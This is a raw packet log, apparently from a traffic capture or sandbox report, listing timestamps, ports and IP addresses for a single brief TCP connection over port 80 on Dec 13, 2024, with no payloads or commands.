Dec 13, 2024 18:53:23.352956057 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.353029966 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.473134995 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.473155022 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.473830938 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.473841906 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.473855019 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.474523067 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.474855900 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.475189924 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.475193024 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.475281000 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.477344036 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.477358103 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.477370977 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.477711916 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.477711916 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.477725029 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.477809906 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.478790045 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.478804111 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.479084969 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.479084969 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.479859114 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.479993105 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.480017900 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.480320930 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.481386900 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.481400013 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.481666088 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.482372999 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.482387066 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.482482910 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.483689070 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.483700991 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.483931065 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.484905005 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.484916925 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.484994888 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.486053944 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.486066103 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.486696959 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.487309933 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.487332106 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.487395048 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.488437891 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.489264965 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.489289999 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.489356041 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.489839077 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.489850998 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.489897013 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.491090059 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.491120100 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.491167068 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.491183043 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.492652893 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.492665052 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.492791891 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.493741989 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.493753910 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.493813038 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.494807005 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.494820118 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.495053053 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.495872021 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.495883942 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.496911049 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.497842073 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.497855902 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.497975111 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.499361992 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.499375105 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.499586105 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.499598980 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.500113964 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.500113964 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.500113964 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.501210928 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.501223087 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.501355886 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.502233982 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.502245903 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.502316952 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.503326893 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.503504038 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.503525019 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.503637075 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.504394054 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.504471064 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.504494905 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.504559040 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.505569935 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.505621910 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.505688906 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.505759954 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.506896019 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.506941080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.506994963 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.506994963 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.508207083 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.508255959 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.508275032 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.508367062 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.509489059 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.509505033 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.509640932 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.510652065 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.510694981 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.510720968 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.510741949 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.511970997 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.511985064 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.512278080 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.513098955 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.513111115 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.513160944 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.513279915 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.514242887 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.514342070 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.514362097 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.514554024 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.515582085 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.515594006 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.515642881 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.516803980 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.516844034 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.516890049 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.516890049 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.517988920 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.518002033 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.518090010 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.519246101 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.519263983 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.519340038 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.520467997 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.520479918 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.520683050 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.521629095 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.521640062 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.521744967 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.522836924 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.522984028 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.523003101 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.523132086 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.524092913 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.524136066 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.524228096 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.524228096 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.525321007 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.525382042 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.525429010 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.525429010 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.526583910 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.526633978 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.526693106 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.526742935 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.527743101 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.527786970 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.527864933 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.527911901 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.529226065 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.529274940 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.529505968 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.529553890 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.530277014 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.530289888 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.530332088 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.531553030 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.531601906 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.531683922 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.531733036 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.533014059 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.533025026 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.533062935 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.533126116 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.534039021 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.534049988 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.534100056 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.535130024 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.535206079 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.535330057 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.535378933 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.536324978 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.536385059 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.536474943 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.536519051 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.537497044 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.537549019 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.665128946 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.665148020 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.665211916 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.665239096 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.665832996 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.665896893 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.666171074 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.666222095 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.667093039 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.667104006 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.667154074 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.668142080 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.668154001 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.668297052 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.669367075 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.669433117 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.669456959 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.669496059 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.670439005 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.670484066 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.670550108 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.670597076 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.671760082 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.671813011 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.672398090 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.672475100 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.673760891 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.673774004 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.673815012 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.673856974 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.674329996 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.674343109 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.674375057 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.674401045 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.675359011 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.675407887 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.675467014 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.675518990 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.676539898 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.676584005 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.676605940 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.676651955 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.677808046 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.677856922 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.677931070 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.677969933 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.678977966 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.679049015 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.679075003 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.679116964 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.680119991 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.680174112 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.680211067 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.680262089 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.681412935 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.681468964 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.681579113 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.681632996 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.683006048 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.683018923 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.683101892 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.684036970 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.684048891 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.684092999 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.685848951 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.685862064 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.685900927 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.686570883 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.686584949 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.686625957 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.687469006 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.687483072 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.687521935 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.688744068 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.688786983 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.688855886 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.688910961 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.689817905 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.689872026 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.689872980 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.689919949 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.691164970 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.691179037 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.691217899 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.692269087 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.692327976 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.692394018 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.692445040 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.693470001 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.693517923 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.693583965 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.693628073 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.694679976 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.694725990 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.694740057 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.694789886 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.695972919 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.696021080 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.696073055 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.696120977 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.697084904 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.697134972 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.697211027 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.697289944 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.698363066 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.698375940 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.698415995 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.699541092 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.699593067 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.699601889 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.699639082 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.700907946 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.700922012 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.700959921 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.701993942 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.702004910 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.702052116 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.703249931 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.703263044 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.703301907 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.704313993 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.704363108 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.704432964 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.704483986 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.705765009 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.705776930 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.705818892 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.706702948 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.706753016 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.707103014 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.707153082 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.708472967 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.708483934 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.708529949 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.709549904 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.709562063 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.709619999 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.710354090 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.710403919 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.710474968 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.710524082 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.711720943 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.711770058 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.711849928 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.711898088 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.712821960 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.712868929 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.713498116 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.713546038 CET	49847	80	192.168.2.7	45.11.183.55
Dec 13, 2024 18:53:23.714953899 CET	80	49847	45.11.183.55	192.168.2.7
Dec 13, 2024 18:53:23.714967012 CET	80	49847	45.11.183.55	192.168.2.7
